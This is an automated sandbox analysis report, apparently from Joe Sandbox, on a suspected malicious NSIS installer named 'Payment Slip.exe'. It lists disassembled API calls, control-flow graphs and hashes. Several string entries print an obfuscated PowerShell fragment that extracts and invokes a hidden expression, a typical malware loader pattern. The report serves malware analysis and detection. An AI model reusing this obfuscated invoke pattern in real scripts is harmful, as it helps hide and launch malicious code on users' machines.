                                              • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                                                • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                              • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Payment Slip.exe",00000000), ref: 004033D9
                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Payment Slip.exe",00000020), ref: 00403400
                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
                                              • DeleteFileW.KERNELBASE(1033), ref: 0040356F
                                              • OleUninitialize.OLE32(?), ref: 0040361F
                                              • ExitProcess.KERNEL32 ref: 0040363F
                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040364B
                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Payment Slip.exe",00000000,?), ref: 00403657
                                              • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
                                              • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ",?), ref: 004036C4
                                              • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
                                              • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                                              • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                                              • ExitProcess.KERNEL32 ref: 004037BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                              • String ID: "C:\Users\user\Desktop\Payment Slip.exe"$';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                              • API String ID: 4107622049-1245531394
                                              • Opcode ID: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
                                              • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                                              • Opcode Fuzzy Hash: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
                                              • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 116 4052d1-4052ec 117 4052f2-4053bb GetDlgItem * 3 call 404162 call 404a2f GetClientRect GetSystemMetrics SendMessageW * 2 116->117 118 40547d-405484 116->118 140 4053d9-4053dc 117->140 141 4053bd-4053d7 SendMessageW * 2 117->141 120 405486-4054a8 GetDlgItem CreateThread FindCloseChangeNotification 118->120 121 4054ae-4054bb 118->121 120->121 123 4054d9-4054e3 121->123 124 4054bd-4054c3 121->124 125 4054e5-4054eb 123->125 126 405539-40553d 123->126 128 4054c5-4054d4 ShowWindow * 2 call 404162 124->128 129 4054fe-405507 call 404194 124->129 131 405513-405523 ShowWindow 125->131 132 4054ed-4054f9 call 404106 125->132 126->129 135 40553f-405545 126->135 128->123 137 40550c-405510 129->137 138 405533-405534 call 404106 131->138 139 405525-40552e call 405192 131->139 132->129 135->129 142 405547-40555a SendMessageW 135->142 138->126 139->138 143 4053ec-405403 call 40412d 140->143 144 4053de-4053ea SendMessageW 140->144 141->140 145 405560-40558b CreatePopupMenu call 405f0a AppendMenuW 142->145 146 40565c-40565e 142->146 155 405405-405419 ShowWindow 143->155 156 405439-40545a GetDlgItem SendMessageW 143->156 144->143 153 4055a0-4055b5 TrackPopupMenu 145->153 154 40558d-40559d GetWindowRect 145->154 146->137 153->146 157 4055bb-4055d2 153->157 154->153 158 405428 155->158 159 40541b-405426 ShowWindow 155->159 156->146 160 405460-405478 SendMessageW * 2 156->160 161 4055d7-4055f2 SendMessageW 157->161 162 40542e-405434 call 404162 158->162 159->162 160->146 161->161 163 4055f4-405617 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->156 165 405619-405640 SendMessageW 163->165 165->165 166 405642-405656 GlobalUnlock SetClipboardData CloseClipboard 165->166 166->146
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 00405330
                                              • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                                              • GetClientRect.USER32(?,?), ref: 0040537C
                                              • GetSystemMetrics.USER32(00000015), ref: 00405384
                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                                              • ShowWindow.USER32(?,00000008), ref: 00405420
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405441
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                                              • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                                                • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405493
                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A8
                                              • ShowWindow.USER32(00000000), ref: 004054CC
                                              • ShowWindow.USER32(?,00000008), ref: 004054D1
                                              • ShowWindow.USER32(00000008), ref: 0040551B
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                                              • CreatePopupMenu.USER32 ref: 00405560
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                                              • GetWindowRect.USER32(?,?), ref: 00405594
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                                              • OpenClipboard.USER32(00000000), ref: 004055F5
                                              • EmptyClipboard.USER32 ref: 004055FB
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                                              • GlobalLock.KERNEL32(00000000), ref: 00405611
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                                              • CloseClipboard.USER32 ref: 00405656
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 4154960007-366298937
                                              • Opcode ID: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
                                              • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                                              • Opcode Fuzzy Hash: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
                                              • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 412 405f0a-405f15 413 405f17-405f26 412->413 414 405f28-405f3e 412->414 413->414 415 405f44-405f51 414->415 416 406156-40615c 414->416 415->416 419 405f57-405f5e 415->419 417 406162-40616d 416->417 418 405f63-405f70 416->418 420 406178-406179 417->420 421 40616f-406173 call 405ee8 417->421 418->417 422 405f76-405f82 418->422 419->416 421->420 424 406143 422->424 425 405f88-405fc4 422->425 426 406151-406154 424->426 427 406145-40614f 424->427 428 4060e4-4060e8 425->428 429 405fca-405fd5 GetVersion 425->429 426->416 427->416 430 4060ea-4060ee 428->430 431 40611d-406121 428->431 432 405fd7-405fdb 429->432 433 405fef 429->433 435 4060f0-4060fc call 405e2f 430->435 436 4060fe-40610b call 405ee8 430->436 438 406130-406141 lstrlenW 431->438 439 406123-40612b call 405f0a 431->439 432->433 434 405fdd-405fe1 432->434 437 405ff6-405ffd 433->437 434->433 440 405fe3-405fe7 434->440 450 406110-406119 435->450 436->450 442 406002-406004 437->442 443 405fff-406001 437->443 438->416 439->438 440->433 446 405fe9-405fed 440->446 448 406040-406043 442->448 449 406006-40602c call 405db5 442->449 443->442 446->437 453 406053-406056 448->453 454 406045-406051 GetSystemDirectoryW 448->454 461 406032-40603b call 405f0a 449->461 462 4060cb-4060cf 449->462 450->438 452 40611b 450->452 458 4060dc-4060e2 call 40617c 452->458 455 4060c1-4060c3 453->455 456 406058-406066 GetWindowsDirectoryW 453->456 459 4060c5-4060c9 454->459 455->459 460 406068-406072 455->460 456->455 458->438 459->458 459->462 464 406074-406077 460->464 465 40608c-4060a2 SHGetSpecialFolderLocation 460->465 461->459 462->458 467 4060d1-4060d7 lstrcatW 462->467 464->465 469 406079-406080 464->469 470 4060a4-4060bb SHGetPathFromIDListW CoTaskMemFree 465->470 471 4060bd 465->471 467->458 473 406088-40608a 469->473 470->459 470->471 471->455 473->459 473->465
                                              APIs
                                              • GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                                              • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
                                              • CoTaskMemFree.OLE32(?), ref: 004060B3
                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                              • String ID: ';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 900638850-1253520087
                                              • Opcode ID: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
                                              • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                                              • Opcode Fuzzy Hash: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
                                              • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 474 405770-405796 call 405a3b 477 405798-4057aa DeleteFileW 474->477 478 4057af-4057b6 474->478 479 40592c-405930 477->479 480 4057b8-4057ba 478->480 481 4057c9-4057d9 call 405ee8 478->481 483 4057c0-4057c3 480->483 484 4058da-4058df 480->484 487 4057e8-4057e9 call 40597f 481->487 488 4057db-4057e6 lstrcatW 481->488 483->481 483->484 484->479 486 4058e1-4058e4 484->486 489 4058e6-4058ec 486->489 490 4058ee-4058f6 call 40622b 486->490 491 4057ee-4057f2 487->491 488->491 489->479 490->479 498 4058f8-40590c call 405933 call 405728 490->498 494 4057f4-4057fc 491->494 495 4057fe-405804 lstrcatW 491->495 494->495 497 405809-405825 lstrlenW FindFirstFileW 494->497 495->497 499 40582b-405833 497->499 500 4058cf-4058d3 497->500 516 405924-405927 call 405192 498->516 517 40590e-405911 498->517 503 405853-405867 call 405ee8 499->503 504 405835-40583d 499->504 500->484 502 4058d5 500->502 502->484 514 405869-405871 503->514 515 40587e-405889 call 405728 503->515 506 4058b2-4058c2 FindNextFileW 504->506 507 40583f-405847 504->507 506->499 510 4058c8-4058c9 FindClose 506->510 507->503 511 405849-405851 507->511 510->500 511->503 511->506 514->506 519 405873-40587c call 405770 514->519 527 4058aa-4058ad call 405192 515->527 528 40588b-40588e 515->528 516->479 517->489 518 405913-405922 call 405192 call 405d82 517->518 518->479 519->506 527->506 530 405890-4058a0 call 405192 call 405d82 528->530 531 4058a2-4058a8 528->531 530->506 531->506
                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment Slip.exe"), ref: 00405799
                                              • lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E1
                                              • lstrcatW.KERNEL32(?,00409014), ref: 00405804
                                              • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment Slip.exe"), ref: 0040580A
                                              • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment Slip.exe"), ref: 0040581A
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                                              • FindClose.KERNEL32(00000000), ref: 004058C9
                                              Strings
                                              • \*.*, xrefs: 004057DB
                                              • "C:\Users\user\Desktop\Payment Slip.exe", xrefs: 00405779
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\Payment Slip.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                              • API String ID: 2035342205-1814209626
                                              • Opcode ID: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
                                              • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                                              • Opcode Fuzzy Hash: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
                                              • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                              • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                                              • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                              • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406236
                                              • FindClose.KERNEL32(00000000), ref: 00406242
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: WB
                                              • API String ID: 2295610775-2854515933
                                              • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                              • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                                              • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                              • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                              • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: AddressHandleLibraryLoadModuleProc
                                              • String ID:
                                              • API String ID: 310444273-0
                                              • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                              • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
                                              • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                              • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 167 4038b2-4038ca call 406252 170 4038cc-4038dc call 405e2f 167->170 171 4038de-403915 call 405db5 167->171 180 403938-403961 call 403b88 call 405a3b 170->180 176 403917-403928 call 405db5 171->176 177 40392d-403933 lstrcatW 171->177 176->177 177->180 185 4039f3-4039fb call 405a3b 180->185 186 403967-40396c 180->186 192 403a09-403a2e LoadImageW 185->192 193 4039fd-403a04 call 405f0a 185->193 186->185 188 403972-40399a call 405db5 186->188 188->185 194 40399c-4039a0 188->194 196 403a30-403a60 RegisterClassW 192->196 197 403aaf-403ab7 call 40140b 192->197 193->192 198 4039b2-4039be lstrlenW 194->198 199 4039a2-4039af call 405960 194->199 200 403a66-403aaa SystemParametersInfoW CreateWindowExW 196->200 201 403b7e 196->201 210 403ac1-403acc call 403b88 197->210 211 403ab9-403abc 197->211 205 4039c0-4039ce lstrcmpiW 198->205 206 4039e6-4039ee call 405933 call 405ee8 198->206 199->198 200->197 203 403b80-403b87 201->203 205->206 209 4039d0-4039da GetFileAttributesW 205->209 206->185 213 4039e0-4039e1 call 40597f 209->213 214 4039dc-4039de 209->214 220 403ad2-403aef ShowWindow LoadLibraryW 210->220 221 403b55-403b56 call 405265 210->221 211->203 213->206 214->206 214->213 223 403af1-403af6 LoadLibraryW 220->223 224 403af8-403b0a GetClassInfoW 220->224 227 403b5b-403b5d 221->227 